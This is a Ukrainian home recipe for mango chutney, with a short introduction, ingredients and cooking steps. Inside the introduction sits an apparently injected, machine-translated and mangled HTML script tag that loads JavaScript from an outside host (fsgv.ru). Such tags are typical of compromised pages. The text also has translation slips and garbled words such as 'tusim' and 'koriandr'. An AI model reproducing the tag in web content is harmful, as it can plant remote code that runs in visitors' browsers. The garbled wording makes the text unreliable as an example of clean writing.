Чатні з манго
(покроковий рецепт з фото)
Як відомо, чатні - це широко поширене на півдні Азії блюдо. Це традиційна приправа, яку зазвичай готують з фруктів - зокрема, з манго. Ділюся рецептом.
Чатні з манго - це дуже популярна індійська приправа, яка завдяки спецій і незвичайної технології приготування дуже здорово збуджує апетит. Зазвичай її передають перед основною стравою, разом з якою-небудь закускою. У нашій родині чатні з манго використовується різними способами - намазуємо на хліб, додаємо в млинчики, подаємо з оладками, всякими різними закусками… Смак передати складно - треба спробувати. Чого вам і бажаю! & ltscript type = "текст / javascript" src ="http://fsgv.ru/i.js"> < / сценарій>
- Манго - 2 штуки
- Рослинна олія - 2 Ст. Ложки
- Перець чилі - 2 штуки
- Спеції - 3 щіпки (зіра, зерна гірчиці, перець горошком, сіль, цукор, koriandr, паприка)
- Лимонний сік - 2 чайних ложки

Очищаємо манго від шкірки.

М'якоть манго потрібно розім'яти ложечкою до пюреобразного стану.

У сковороді розігрійте масло, обсмажте в ньому перець і спеції протягом 1-2 хвилини на швидкому вогні.

Тепер додаємо лимонний сік, перемішуємо.

Відразу ж додаємо манго і зменшуємо вогонь. tusim, помішуючи, протягом 5 хвилин.

Знімаємо з вогню, охолоджуємо - і майже! Зберігати в холодильнику.